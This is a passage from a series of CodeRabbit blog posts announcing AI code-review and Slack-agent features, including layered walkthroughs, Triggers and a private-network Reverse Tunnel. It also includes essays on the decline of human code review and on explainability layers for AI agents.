detailing payment intent and calendar export system changes in a summary table.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_2eec9b71de.png) Each layer comes with its own summary scoped to the changes inside it. You can read top-down for the full story, or jump to the layer that matters most to the kind of review you're doing. Security folks tend to want the boundary stuff, frontend folks tend to want the responses. It works the same way whether a human or an AI agent wrote the changes. But the AI case is where it pays off most: when you can't ask the author what they were thinking, the walkthrough has to show the work instead. Layer Based Walkthroughs are how CodeRabbit does that. ## Suggested reviewers instructions: CodeRabbit says who reviews what CodeRabbit has had suggested reviewers in the walkthrough for a while now. The suggestions come from git history and code ownership, which works well in steady-state codebases where the right reviewer for a file is whoever's been touching it recently. It works less well in two cases: * The right reviewer isn't the most recent contributor. They're the subject matter expert for that area: the security team for anything in auth/, the data platform team for any migration, the SRE on call this week for infra changes. * The right reviewer is a team, not a person. [Suggested reviewers instructions](https://docs.coderabbit.ai/pr-reviews/walkthroughs#suggested-reviewers) let you spell this out directly in the CodeRabbit YAML file. Map reviewers, individual users or teams, to the conditions where they should be assigned: ![Suggested reviewer instructions describing mapping users to PR scenarios and GitHub team support.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_33796046a9.png) ![Code snippet showing review instructions for different developer groups based on pull request changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/carbon_2_5a7479b283.png) When the list is empty, CodeRabbit falls back to its existing prior-PR-based suggestions, so you can be as exhaustive or as selective as makes sense for your team. A couple of small things worth flagging: * Team handles are supported on GitHub. On GitLab, group handles are ignored; only individual user handles get resolved and assigned. * Pair this with auto\_assign\_reviewers: true if you want CodeRabbit to actually request reviews from the suggested folks, not just list them in the walkthrough. ## Try them out If you've been mentally reconstructing the order of changes in every PR you open, Layered Walkthroughs should take a chunk of that off your plate. If you've been writing the same Slack messages over and over, "Hey, can someone from the platform team take a look at this?", suggested_reviewers_instructions will handle that part for you. [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

Introducing CodeRabbit Review: The first AI-native code review interface

Priyanka Kukreja — Wed, 13 May 2026 00:00:00 GMT

## **Code review has been broken for 18 years. We built the fix.** If you have been reviewing code for more than a few years, you know a quiet truth that nobody has bothered to fix. Code Review has essentially been the same since GitHub was launched in 2008. Files, alphabetical order, scroll to the bottom. Rinse and repeat 1,000 times a year. Meanwhile, the author who wrote the pull request understands it as a story, as a new data shape, the logic that consumes it, the call sites, and the tests. That story exists in their head but nowhere in the review interface. The reviewer has to reconstruct it from scratch, file by alphabetical file, before they can even begin to evaluate correctness. That cognitive overhead is why big PRs sit for days. It is why senior engineers often rubber-stamp anything over 500 lines. It is why architectural feedback is rare and nit-picks are abundant. The tool has been shaping the behavior, and not in a good direction. **Today, CodeRabbit is shipping CodeRabbit Review, a fundamentally different way of doing code review.** ## **What CodeRabbit Review does** %[https://youtu.be/yS0EwgA2zjw] CodeRabbit Review takes any pull request and reorganizes it from a flat file list into a guided walkthrough. Instead of presenting files alphabetically, it groups related work into a small number of independent change cohorts. Each cohort is broken into ordered layers that reflect the natural reading order of the change. It is the way a thoughtful senior engineer would choose to walk someone through it. And every layer anchors to specific line ranges in the actual diff, and carries its own AI-generated summary. When the structure of a layer warrants it, such as a new API contract, a state transition, or a cross-service call sequence, CodeRabbit Review generates a diagram alongside the diff. CodeRabbit Review renders the visual that best captures what the code is actually doing, whether that is a sequence diagram, a state machine, or an entity-relationship diagram. Not every layer gets one, just the ones for which a visual aid would make things easier to understand. ![Dark-themed code editor displaying a Git pull request with a side-by-side code diff.](https://victorious-bubble-f69a016683.media.strapiapp.com/change_stack_3panel_98ae54e205.png) The three-panel layout puts cohort and layer navigation on the left, the diff in the center, and per-range context on the right. Keyboard navigation ('J' to advance, 'K' to go back, 'Z' for focus mode) keeps your hands off the mouse. Reviewers mark files as viewed, drop inline comments against specific ranges, accumulate a draft review, and submit a real GitHub review, all without switching tabs. Critically, reviews post back to GitHub natively. It is an upgrade to the review interface that still lands comments and approvals exactly where your team expects them, without disrupting your existing workflow. ## **Why you should care** If you are a senior developer or a tech lead whose team is shipping multiple, complex PRs in any given week, then you know that the *de facto* bottleneck on the team’s merge velocity is providing fast review without sacrificing quality. CodeRabbit Review directly addresses that constraint, by breaking down the code change into easy-to-review chunks, arranged in a logical manner. CodeRabbit Review also helps with cross-team reviews, those where you get pulled in because you had owned a touched file or a security-sensitive path. Prior to CodeRabbit Review , on a PR like this, you’d typically spend your first 20 minutes reverse engineering what the PR is even about before you can even consider next steps. CodeRabbit Review , however, makes that orientation immediate. For example, an CodeRabbit Review sequence diagram showing the new call path, or a state machine illustrating the updated lifecycle reduces that 20 minutes of reverse engineering to 30 seconds. ## **Why we think this approach is better** The current generation of AI code review tools address the review bottleneck by layering a smarter comment bot on top of the existing GitHub interface. But, that approach backfires. More comments on an already noisy PR thread increase the cognitive load on the reviewer, who now has to parse code changes, human feedback, and AI-generated commentary all at once. The problem is worse for large, unstructured diffs, and this problem has compounded sharply as AI-generated code volume has surged over the past year. CodeRabbit Review, however, is a completely different angle on how the review process works. It assists the reviewer to reduce this cognitive load by providing a walkthrough of how the PR author would have crafted the diff, all while augmenting that with visuals. ## **Built for how reviews actually work** ![Code review interface showing a highlighted comment extending IIRRReviewState with viewerSubmittedReview.](https://victorious-bubble-f69a016683.media.strapiapp.com/change_stack_Summary_e9fa27faa3.png) * **Reviewable layers:** CodeRabbit Review breaks a PR into functional layers, so reviewers can move through the change by intent instead of the raw file order. * **Diagrams (when they help):** Layers can include Mermaid diagrams for real flows, state changes, data relationships, or schema changes. Simple layers stay text-only. * **Layer-scoped diffs:** Each layer shows the code ranges that belong to it, with surrounding context, so reviewers stay focused on the part of the PR being explained. * **Active summary sync:** As reviewers scroll through a layer, the right rail of the user interface highlights the summary that matches the code currently in view. * **Snapshot history:** CodeRabbit Review retains a snapshot for a PR, and reviewers can switch between them from a snapshot selector. * **Out-of-date warnings:** If the PR has moved beyond the snapshot being viewed, CodeRabbit Review shows that the view is stale and identifies the commit it was generated from. * **GitHub-native reviewing:** Comments and final review actions (approvals, change requests) sync with the GitHub surface. * **Public read-only sharing:** Public PR walkthroughs can be opened without signing in. Commenting still requires GitHub authentication. * **Reviewer-owned sign-in:** The GitHub sign-in flow preserves the exact CodeRabbit Review URL, including the selected layer or snapshot, and posts review activity as the reviewer. * **Opt-in workflow:** CodeRabbit Review opens from a CodeRabbit link and leaves the normal GitHub PR workflow intact for anyone who does not use it. ## **What comes next** CodeRabbit Review is the beginning of a more guided review experience. Code review should show more than what changed. It should help teams understand why it changed, where to focus, and how each decision fits into the larger system. We are building toward reviews that feel less like parsing diffs and more like following the story of the software as it evolves. *The diff has not changed in 18 years. We think it is time.* **CodeRabbit Review is available for free for a limited time to all users. Try it on the next large PR that lands in your queue. The “Review Change Stack” button is in CodeRabbit's PR summary comment.**

Now the agent moves first

Konrad Sopala — Wed, 13 May 2026 00:00:00 GMT

It's 3:47am and Datadog alerts you of an issue with your checkout service. The \#prod-alerts channel lights up and the engineer on call scrolls it, opens the runbook, pulls the dashboard, checks the last few deploys and starts typing the same kind of "here's what's happening" post they wrote last Tuesday. And the Tuesday before. Most of what happens after a Slack alert is muscle memory. You read the alert, decide if it's real, gather the context and then reply in thread with the next step. So far, [Automations](https://docs.coderabbit.ai/slack-agent/automations) in CodeRabbit Agent for Slack could run on a clock \- every few minutes, hourly, daily, weekly. Perfect for "summarize last week's shipped changes every Monday." Not so perfect for the messy reality of incidents, deployments and customer pings, which don't run on a clock. Something happens and then someone reacts. That's how most incidents work. So that's how the agent should work too. ## Meet Triggers %[https://youtu.be/Mw-g9txKrrY?si=p3LoJowpGRzfq-V_] [Triggers](https://docs.coderabbit.ai/slack-agent/automations#triggers) are rules that start CodeRabbit Agent for Slack the moment a matching event lands. Instead of waiting for a scheduled run, the agent fires when something real happens \- a new alert in a channel, a Datadog event, a PagerDuty incident \- and replies right in the triggering thread with whatever investigation, action, or next step you told it to take. You create and manage them from the new Triggers tab inside the [Automations page](https://agent.coderabbit.ai/automations/triggers) in the CodeRabbit Agent web app. ## The four parts of a trigger Every trigger is made of the same four pieces: * **Source**: Where the event comes from (a Slack channel message, or a webhook from a service like Datadog) * **Matching rules**: Which events should actually fire the trigger * **Agent instructions**: What CodeRabbit Agent for Slack should do when it runs * **Destination**: Where the agent posts the result Today, you can set up two source types. ## Slack channel messages A Slack channel message trigger watches a specific channel for new top-level messages and fires whenever one matches the rule. Use it when CodeRabbit should react to repeated operational events \- new alerts, queue-health posts, deployment notices, customer escalations \- where the same kind of message keeps showing up and a human keeps doing the same kind of follow-up. You can match on: * **All new top-level messages** in the channel * **Text filters** using case-insensitive substring matching * **A required author allowlist** for specific Slack bots or Slack apps Two guardrails worth flagging: * **Only bots and apps can fire these triggers.** Messages from human teammates never match, even if the text would otherwise qualify. The author allowlist is required, not optional. * **The agent always replies in the triggering thread.** Same-thread delivery is enforced, so the investigation lives right under the alert that prompted it, not in some unrelated channel. There's no Run now button for these. To test one, post a matching message in the channel from the allowlisted bot or app. ### Example: React to new Datadog alerts A reliability team wants CodeRabbit Agent for Slack to investigate each new Datadog alert posted in `#prod-alerts`. An engineer asks CodeRabbit to save a trigger that watches new channel messages from the Datadog bot, checks whether each alert looks real, and replies with the next step. From that point on, every matching alert in `#prod-alerts` gets a thread reply from the agent. The trigger stays in that channel and only runs when a matching message arrives. ## Webhook events Triggers also accepts inbound webhooks for services that don't post to Slack as a bot. Supported providers include Datadog, PagerDuty, Pylon, and Custom webhook. After saving a webhook trigger, CodeRabbit provides the webhook URL, required header, and a sample payload so you have everything needed to connect your source service in minutes. You can match webhook events by: * Provider event type * JSON payload fields, or any combination of the two Events that don't match any rule are dropped automatically, so nothing fires by accident. ## Setting one up 1. Open Automations \> Triggers in the [CodeRabbit Agent for Slack web app](http://agent.coderabbit.ai/automations/triggers) 2. Pick the source \- Slack channel message or one of the webhook providers 3. Define the matching rules 4. Write the agent instructions, exactly like what you'd otherwise type after `@coderabbit` in Slack 5. Pick the channel and delivery mode ![Configuration screen for setting up a new trigger with event selection and action details.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_d2560ddf4e.png) The trigger goes live immediately. Like every other automation, it runs under the [scope](https://docs.coderabbit.ai/slack-agent/scopes) that applies to the channel where it lives, so it only ever reaches the repositories, connections, and spend limits that surface is allowed to touch. ## Who can manage triggers Workspace admins can view and manage all triggers, while other users can only see and manage their own. Message-triggered automations can't be run manually; to test one, post a matching message in the channel. The Automations page also tracks run history, linking through to [thread reviews](https://docs.coderabbit.ai/slack-agent/thread-reviews) so you can inspect exactly what the agent did, for whom, and how many agent minutes it used. ## Try it out Triggers are available now in the [Automations page](https://agent.coderabbit.ai/automations/triggers) of your CodeRabbit Agent for Slack workspace. New to CodeRabbit Agent for Slack? Head to [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) to get started. New customers receive $50 per user in free agent minutes. When that same alert wakes up your channel at 3 AM, save a trigger and let the agent take it from there. [**Get started with CodeRabbit Agent for Slack**](https://agent.coderabbit.ai)

Nobody is going to read the code

David Loker — Tue, 12 May 2026 00:00:00 GMT

Let me say something that's uncomfortable coming from someone in my position. AI coding tools are still way worse than humans at generating correct code. And humans were bad enough as it was. We're not even at the point where AI matches human error rates. We’re well past them in the wrong direction. That's not a reason to stop using AI coding tools. It's a reason to be honest about what comes next. Here's my prediction. Within the next 12 months, most developers are not going to be looking at the code at all. Let me explain why. ## The review problem is real, but it's not new Human code review has been breaking down for years. I used to spend 20-30% of my time reviewing code. That felt like a lot. It wasn't sustainable even then. Now AI-assisted development has accelerated the volume of code coming through review without adding any time to review it. The pressure that was already there is now acute. That part of the story has been told. What hasn't been told precisely is why the specific problems AI introduces are ones human reviewers are structurally bad at catching, and why that mismatch is what will make human review untenable, not just strained, within the next year. ## What human review can't keep up with The data makes this uncomfortably specific. Logic and correctness problems are 75% more common in AI PRs than human ones, according to CodeRabbit's [State of AI vs. Human Code Generation Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report), which analyzed 470 open-source GitHub pull requests. Error and exception handling gaps are nearly double. These are the failure modes that cause outages, and logic errors are among the most expensive to fix and the most likely to cause downstream incidents. Catching them requires a reviewer to mentally exit the happy path and think through every edge case in code they didn't write and may not fully understand. ![Bar chart titled 'AI produces more critical issues' showing 341 for AI and 240 for Human.](https://victorious-bubble-f69a016683.media.strapiapp.com/What_human_review_can_t_keep_up_with_7e215bb937.png) Security compounds this further. AI PRs show security issues up to 2.74x higher than human PRs. The most prominent patterns involve improper password handling and insecure object references. These aren't bugs you spot at a glance. Catching them means thinking like an attacker, asking not "does this work?" but "can this be exploited?" That's a different cognitive mode, and not one every reviewer can sustain reliably, especially across a large diff they didn't author. There's also a readability problem that makes all of this worse. AI-generated code produces more than 3x the readability issues of human code. That’s because it looks clean while quietly violating local conventions and structure. As the report puts it, AI-produced code often looks consistent but violates local patterns around naming, clarity, and structure. That's the worst kind of review problem, one where code that scans fine but requires deep familiarity with the codebase to catch what's actually wrong. And if you've been using AI code generation heavily, you may genuinely not know the choices that led to the code in front of you. The reasoning is opaque. You're reviewing an output, not a thought process. You don't know where to look because you don't know where the decisions were made. This is where the conversation about AI and code quality tends to stop. I think it needs to go somewhere else entirely. ## Verification, not just review What I see happening over the next 12 months is that validation shifts from reading code to verifying intent. Did the thing I wanted to happen, happen? Does the feature behave the way the prompt described? Those are answerable questions that don't require a developer to parse every exception handler in a sprawling diff. The layer that actually reads the code becomes automated. AI code review, static analysis, security linting, required test coverage, and not stopgaps. The organizations already figuring this out are treating automated review as a structural requirement, not an optional layer. They're building validation pipelines that check outputs against intent. They're not debating whether the code looks right. They've accepted that they won't be the ones looking. Every company I talk to using AI code generation is viscerally aware of what's happening inside their organization. The excitement was real. The speed gains were real. So is the reality that sets in after a while. That reality is filled with reverting PRs, chasing bugs that are hard to attribute, and fixing things that should have been caught earlier. The amount of context a model would need to hold simultaneously to generate truly correct code makes perfect output a hard problem to solve quickly. These systems are not going to stop introducing issues anytime soon. We’re going to keep coding with AI. We’re addicted. So now comes the question of whether you have the infrastructure to catch what AI gets wrong before it reaches production. Most teams don’t have that infrastructure, and the gap between AI's speed and the ability to validate its output is widening. ![Green number +11,885, red number -26, and a progress bar on a dark background.](https://victorious-bubble-f69a016683.media.strapiapp.com/10k_line_PR_3ecf3e10cd.png) You can't review a 10,000-line PR the way you'd review a hundred-line one. Nobody can. The sooner engineering organizations accept that and build accordingly, the better positioned they'll be when, and not if, the human review model breaks down entirely. The code will keep coming. The question is what you put between it and production.

Introducing CodeRabbit Reverse Tunnel: AI code review for private-network enterprises

Henry Lau — Fri, 08 May 2026 00:00:00 GMT

[CodeRabbit Reverse Tunnel](https://docs.coderabbit.ai/self-hosted/coderabbit-reverse-tunnel) is a new private-network connectivity option, a first-party component that lets CodeRabbit review pull requests on a [GitHub Enterprise Server (GHES)](https://docs.coderabbit.ai/platforms/github-enterprise-server) instance that does not accept inbound network connections. If your team runs GHES inside a private network with no public endpoint, no inbound firewall exceptions, no vendor IP allowlisting on the GHES side, and no PrivateLink or peering path, this is for you. It's available for [Enterprise Plan](https://coderabbit.ai/enterprise) customers today. What it unlocks: * AI code review on a private Git platform, with no exposure to the public internet. * No new inbound firewall rules, no platform-side IP allowlist, and no PrivateLink or peering required. * A Connector that deploys into your existing container runtime, alongside other internal workloads. * A standard, auditable network shape: Outbound HTTPS on TCP 443\. ## Why we built Reverse Tunnel A class of enterprise customers operates GitHub Enterprise Server inside a private network with no inbound connectivity by design. These security constraints are typically codified in audit and compliance frameworks and cannot be relaxed for individual vendor onboarding. Existing solutions like VPN tunnels, public-ELB exposures, and PrivateLink peering require either an inbound route into the customer network or a cloud-provider solution. Without an alternative transport, these customers have no compliant path to deploy CodeRabbit. CodeRabbit Reverse Tunnel exists to close this gap. It enables these enterprises to adopt AI code review while preserving the security and compliance constraints they already have in place. ## How CodeRabbit Reverse tunnel works ![CodeRabbit Reverse Tunnel architecture diagram details secure data flow between customer and CodeRabbit systems.](https://victorious-bubble-f69a016683.media.strapiapp.com/Architecure_049d2dd8f6.png) CodeRabbit Reverse Tunnel is built around two components: a Connector that runs inside your network and a Gateway operated by CodeRabbit. Together they create a single outbound channel over which CodeRabbit can read from and write to your private GHES instance, without your network accepting any inbound connections. ### Components 1. **Reverse Tunnel Connector.** A lightweight, stateless container that runs inside your enterprise network. On startup, it dials out and establishes a long-lived WebSocket Secure (WSS) session to the Gateway on TCP 443\. All subsequent CodeRabbit traffic to GHES flows through this session. 2. **Reverse Tunnel Gateway.** A CodeRabbit-managed edge service that accepts Connector sessions and brokers CodeRabbit's runtime requests back through them. The Gateway authenticates each session using credentials issued to your tenant and routes traffic to the right Connector. ## **What happens when a developer opens a PR!** ![Sequence diagram illustrating a developer workflow with customer network and Lucihaus systems.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_4f088f3c64.png) When a developer opens a PR, GHES sends a signed webhook outbound through your existing NAT to CodeRabbit. Everything that follows runs on the WSS session your Connector has already opened: the Reverse Tunnel Gateway forwards CodeRabbit's read requests over WSS, the Connector translates them into internal HTTPS calls to GHES, and responses stream back the same way. CodeRabbit generates the review and posts the comments back through the same tunnel. ## **Getting started with CodeRabbit Reverse Tunnel** CodeRabbit Reverse Tunnel is available now for Enterprise Plan customers running GitHub Enterprise Server in private networks, with support for additional Git platforms on the roadmap. Our goal is always to provide flexible deployment options for our customers and this release is a testament to that. Customers who self host with strict requirements can now take our state of art review engine to deliver high quality code faster. We’re committed to making our customers successful and our team is here to answer any questions you have along the way. For detailed information, please consult the [documentation](https://docs.coderabbit.ai/self-hosted/coderabbit-reverse-tunnel) or [contact our team](https://www.coderabbit.ai/contact-us/sales).

Do you trust your AI Agent?

Priyanka Kukreja — Fri, 08 May 2026 00:00:00 GMT

## Your AI agent needs to show its homework >Explainability is what determines whether an AI Agent gets deployed to solve real-world problems, or remains a sidekick on non-critical enterprise tasks. A year ago, Agentic AI launched and blew everyone away. It transformed the LLMs from a chat tool to the one that can actually “do” things for you. But now that agents are near-ubiquitous, they face a tougher problem: Earning trust. An agent can be called "autonomous", but if it can't explain to my stakeholders the what and why of my agent’s actions (say, my manager or my customers or my audit review team), then its autonomy isn't really worth much. Whether agents get used on serious work, or stay sidekicks on low-stakes tasks, comes down to just one thing: can people really understand what it’s doing? ## Do you really need explainability? First, it's worth separating "explainability" and "observability", which are sometimes (incorrectly) used interchangeably. **Observability** is about "what happened". This is a simple mechanical record of actions, tool calls, inputs, outputs, branching paths. This is an engineering problem that's largely solved. You can build structured logging for , and the challenge here is making those logs useful at scale. **Explainability** is about "why it happened". This is about understanding agent's reasoning behind decisions, the alternatives it considered, how confident it was. etc. This is the harder, partly unsolved problem. Now, if any of the following holds true, the agent has to explain itself further. ![Diagram illustrating factors for AI agent explainability: scope, cost, and sensitive contexts.](https://victorious-bubble-f69a016683.media.strapiapp.com/why_your_agent_needs_to_explain_itself_59330f32e5.jpeg) In these situations, if the agent can't explain itself, you end up with a trust deficit. A classic example of this is something every agentic engineering team knows well: an incident occurs and developers are trying to debug what the agent did. They pull up logs, and find that the agent was tasked with X but also did Y and Z. They try to piece together a timeline and the root cause. But the path from agent’s action to real-world outcome isn’t clear, and neither is the reasoning behind those actions. This “trust” tax compounds silently but surely. Once users stop understanding what the agent is doing, they lose confidence it will do the right thing. Over time, they hesitate before handing anything mission-critical, and end up adding manual review steps that eliminate the productivity gain. Sure, the agent offers autonomy, but it fails to build confidence. And, without confidence, autonomy stops getting used (on the things that matter, at least). This is not just a hypothetical failure mode. It shows up across every category of AI deployment: from code review agents that developers second-guess despite high accuracy, to customer-facing agents where support teams shadow every interaction, not because quality is poor, but because no one can explain what happened when a customer escalates their issue to support. This gap between what an agent logs and what a human can actually understand is what ultimately keeps agentic products from getting traction. ## The three jobs of explainability ![Diagram illustrating observing AI agents with verification, debugging, and auditability on a timeline.](https://victorious-bubble-f69a016683.media.strapiapp.com/observing_your_AI_agent_cec3fa1859.jpeg) Explainability has three primary jobs-to-be-done, each requiring a different product response: ### Verification: Did the agent do what I asked? The user wants a fast, high-confidence signal. They are not debugging or looking for a trace. They just want a checkmark. Showing them a tool call log here is the wrong answer. It would be like responding to “did the payment go through?” with a database query result. ### Debugging: Where did it go wrong and why? This user already suspects a failure. They need to trace the decision path, identify the branch where things diverged, and understand the root cause. Here, what they need is depth, not just an outcome or a reassurance. ### Auditability: Can I demonstrate what happened to someone else? The primary consumer here is not the user. It is their manager, their compliance team, their customer, or their future self six months later trying to understand a past decision. Accordingly, the artifact here must be exportable, immutable and structured for a reader with no prior context. A product that tries to serve all three from a single interface will serve none of them well. Each use case has different requirements: verification needs compression, debugging needs depth and auditability needs structure and permanence. ## The Explainability stack ![Diagram showing The Explainability Stack with product and technical thinking stages.](https://victorious-bubble-f69a016683.media.strapiapp.com/the_explainability_stack_d22269fccd.jpeg) I think about explainability and observability as a layered architecture, not a single feature. Each layer is the right answer for a different user in a different context. **Layer 0 - Outcome:** Did it work? A simple binary. This is what most users want most of the time for routine tasks. **Layer 1 - Narrative: **A plain-language summary of what the agent did and why. "Created the PR, flagged three issues, posted inline comments on lines 42, 87, and 203." Think of it as an expedition report: the agent went out, came back, and here is what it found. **Layer 2 - Decision Trace:** Why did the agent make the choices it made? What alternatives did it consider and reject? This is where you begin to see reasoning, not just actions. **Layer 3 - Tool and Branch Log:** What tools were called, with what parameters, what was returned, what paths were explored, what dead ends were hit. This is where engineers live when something breaks. It is still output-based, not reasoning-based, but it shows the mechanical path the agent took. **Layer 4 - Model Reasoning:** Chain-of-thought at inference time. This is where the model starts showing its actual reasoning process. This is super valuable for evaluation, model improvement and fine-tuning pipelines, while still being relevant for end users in production environments when something has gone wrong. **Layers 5 to 7 - The Deep Stack: **Attention patterns, neuron activations, interpretability research. This is the frontier of mechanistic understanding. It is a fascinating science, but not a product feature (yet). The pattern is consistent: the closer someone is to the implementation, the deeper they want to go. A solutions engineer reviewing a weekly agent summary lives at Layer 1. A developer debugging an unexpected tool call lives at Layer 3. A researcher studying emergent model behavior lives at Layer 5. Explainability and observability are not one size fits all and are defined by where your user actually sits. ## Applying the Explainability stack The Explainability stack has two practical applications: (1) defining the right user experience, and (2) diagnosing where your success metrics are breaking down. ### Defining user experience Start by listing every audience that touches your agent: say, for example, the end user, support, the sales engineer, the compliance reviewer. For each, ask which layer they actually need. Most teams collapse this into a single "show logs" toggle, which over-shows to non-technical users and under-shows to engineers. The fix is layered disclosure tied to specific surfaces: **Layer 0 in the headline UI: **A green check on the PR, or a "3 tickets resolved" badge ** Layer 1 in async recaps: **A Monday digest in Slack, or a weekly email summary ** Layer 2 behind a one-click "why?": **On any decision the user might disagree with **Layers 3 and 4: **Gated behind a developer console or audit export The payoff for this segregation shows up in support. When a customer says "the agent did the wrong thing," you can walk down the stack with them, starting from the outcome and going deeper only as needed. That is how trust gets built in practice. ### Diagnosing success metrics Each layer you skip has a cost, and the cost compounds the further along in your deployment you are. **Skipping Layer 0 or 1 hurts adoption. **A basic trust loop with the user is not built, which leads them to never delegate a second task. The agent stalls at novelty. **Skipping Layer 2 hurts retention.** Users only continue handing off work to an agent they feel confident they could overrule. This is why Cursor's diff view and Codex's change preview matter as much to stickiness as a model upgrade, if not more. **Skipping Layer 3 stalls enterprise deals.** The criticality of this layer would depend on the industry and the regulatory environment your product operates in. **Skipping Layer 4 undermines your evals.** Without reasoning traces, your evaluation pipeline anchors on outcomes alone. That makes it nearly impossible to tell whether the agent took the right path to a result, or whether it got lucky on test data. ## Sync vs. Async: Two different products There is a temporal dimension to explainability that most teams underspecify, and it changes the product architecture substantially. **Synchronous explainability** enables users to watch the agent work in real time: thinking traces, live tool-call streams, visible course corrections. This modality serves a different purpose than the final output. It builds confidence during execution. When a user can see the agent head down an unproductive path and self-correct, that visible recovery builds further trust. More importantly, it creates the opportunity for the user to intervene early, saving time and tokens. **Asynchronous explainability** is a post-facto report. The agent executed, returned, and here is a structured account of where it went and what it decided. This format is what makes parallel agent workloads manageable at scale. If you are operating a fleet of agents across a codebase running simultaneous reviews, dependency checks, security scans, you cannot watch each one live. This expedition report format helps provide that management layer. Sync and async explainability are not the same product. They have different information hierarchies, different latency tolerances, and different “emotional contracts” with the user. Building one does not necessarily give you the other. ## The Goldilocks constraint ![Goldilocks Constraint bell curve illustrating optimal productive engagement with just right explanation value.](https://victorious-bubble-f69a016683.media.strapiapp.com/goldilocks_constraint_8022304d5c.jpeg) There is a delicate calibration problem at the center of all of this: Too little explainability: here, users cannot verify the agent’s reasoning, so they will not hand the agent anything that matters. Too much explainability: users hit decision fatigue. Once they stop reading and start rubber-stamping everything because of the sheer volume of output, user engagement becomes performative. It is only a matter of time before the adoption will stall. The perils of first failure mode are well documented above. But the second one works in a more insidious way by producing an appearance of oversight without the substance of it. For anyone operating in a regulated environment, that gap can become a compliance liability faster than it looks. This is also [Goodhart’s Law](https://lawsofsoftwareengineering.com/laws/goodharts-law/) showing up in a new domain: when a measure becomes a target, it stops being a good measure. If “volume of explanation” becomes the proxy for “quality of oversight,” products will optimize the proxy and lose the thing it was meant to measure. More logs, traces, and reasoning text would translate to a reader who has stopped engaging with any of it. The reference point I keep returning to is this: what does a skilled human collaborator tell you after working on something independently? They do not narrate every search query, or share their entire browser history. They say: 'I looked at X and Y. X was a dead end for this reason. Y is the path forward, here is why, and here is what I am not certain about.' ## The rendering question is still open There are several modalities to render explainability: natural language narration, structured timelines, visual diff rendering, collapsible tool call trees. All are legitimate formats depending on context. The more interesting product question is not which modality to choose, but how you empower the agent to determine the appropriate one given the context and the user. For synchronous traces, more raw structure is acceptable since the user is present and can navigate. For asynchronous reports, where the reader has no prior context, you cannot expect them to parse the raw logs. Curation becomes table stakes: relevance, readability, parsability. I do not think this problem has a clean industry solution yet. But teams that frame it as a product design problem, rather than just an engineering logging problem, will get there faster. ## Trust is the whole game A few years from now, we will reflect back on what made certain products more successful than others. One thing would be clear: it is the products with better explainability that enjoy greater user trust and so were the ones chosen to tackle mission-critical tasks. As the foundational models head towards commoditization, the true differentiator would be how deeply a product can build a bond with the user. Trust is the foundation of any bond, for both humans and products. ![Comic: Identical AI models, human effort dismissed, and a model discarded in a trash can.](https://victorious-bubble-f69a016683.media.strapiapp.com/models_eventually_28facda63a.png) At CodeRabbit, this is not just theoretical. We are building explainability across the board on all of our products. The question of how to show developers what happened and why, without burying them in the output, is one we are working through in production right now. More on what that looks like soon!

How to get the most value from CodeRabbit Agent for Slack

David Kravets — Thu, 07 May 2026 00:00:00 GMT

Most teams want a capable teammate in Slack, one that takes real work off their plate, operates in the flow of conversation, and helps people move from question to action without forcing everyone to swivel between tools all day. That is the real opportunity with [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent). Used with intention, it becomes a shared operational layer for your engineering organization. It's part coding assistant, part research partner, part triage operator, part execution engine and, at its core, it brings the same intelligence that powers CodeRabbit's code review engine to every stage of the software development lifecycle. That means engineers get help debugging and shipping, managers get visibility into what changed and why, support teams can investigate escalations without waiting on someone to context-switch, and product managers can understand implementation implications before they file a ticket. In short, the full range of what it can do across agentic SDLC workflows goes well beyond any single role or use case. **The teams that get the most value are the ones that connect it to the right systems, establish clear norms, and build habits that compound over time.** ## **Start with the right mental model** The biggest shift is this. CodeRabbit Agent for Slack is built for the full arc of software delivery, well beyond writing code: * An engineer needs help editing a file or navigating an unfamiliar module * A support lead needs to triage a bug without waiting on a senior engineer * A product manager wants a concise readout of what changed in the last release * An incident manager needs fast context on a system behaving badly Some of the highest-leverage workflows have nothing to do with direct implementation at all. The agent can run daily end-to-end smoke tests and post pass/fail results to Slack every morning, automatically open pull requests for weekly dependency updates grouped by patch, minor, and major versions, and query your observability stack each morning to deliver a severity-rated health digest before standup. But the agent is equally powerful in the moment. A product manager mid-meeting wants to know how a freshly launched feature is performing. She opens a Slack thread, asks the agent to pull a specific dashboard, and within seconds has a count of users who have adopted the feature since launch. The answer arrives in the thread where the conversation is already happening, instantly accessible to everyone in the room, with zero interruption to the people building the product. The common thread is this. The agent handles repeatable operational work and live knowledge requests alike, so the team can focus on decisions that actually require human judgment. The value compounds across every stage of building and operating software with more shared context, less friction, and faster decisions. ## **Connect the systems that matter** The agent earns its keep through the breadth of context it can reach. CodeRabbit Agent for Slack pulls from an unusually wide surface. This includes code repositories and open pull requests, issue trackers like Jira, Linear, and GitHub Issues, documentation in Notion or Confluence, monitoring data from Datadog, Sentry, and PostHog, cloud infrastructure context from AWS and GCP, and Slack itself. And the connections ecosystem grows pretty much everyday. And when it comes to Slack, the agent pulls in Slack conversations, decisions, escalations, and handoffs that represent your team's actual working memory. Teams can extend it further through MCP servers and direct API connections. ![UI displaying 'Add connection' with various integrations like Notion, Jira, Datadog, and Figma.](https://victorious-bubble-f69a016683.media.strapiapp.com/00_b275145b0b.png) That breadth matters because a support question is rarely just a support question. It often touches product behavior, recent releases, internal docs, feature flags, and ownership boundaries. The more of that graph the agent can traverse safely, the more it can help people resolve real work instead of offering generic suggestions. The smartest rollout starts focused, with code repositories, documentation, ticketing, and read-only observability or incident data first. Expand from there once the team sees where the agent is already proving valuable. ## **Set access intentionally and roll out in phases** Good adoption starts with trust, and trust starts with clear boundaries. ![Dark UI displaying page creation settings for general, content types, languages, layouts, and SEO.](https://victorious-bubble-f69a016683.media.strapiapp.com/01_620f57363b.png) Begin with the narrowest access model that still produces useful outcomes. Read-only access alone unlocks substantial value such as code understanding, issue triage, incident context, change summaries, documentation lookups, and planning help. Write capabilities come next, introduced deliberately as the team grows comfortable with how the agent behaves. CodeRabbit's governance runs through scopes. They are bundles that define which repositories the agent can reach, which integrations it can use, which users can invoke it, and what spending limits apply. Every workspace starts with a base scope, with full attribution and auditability for every agent run. A phased rollout works best. Start with a small pilot group, connect a focused set of tools, 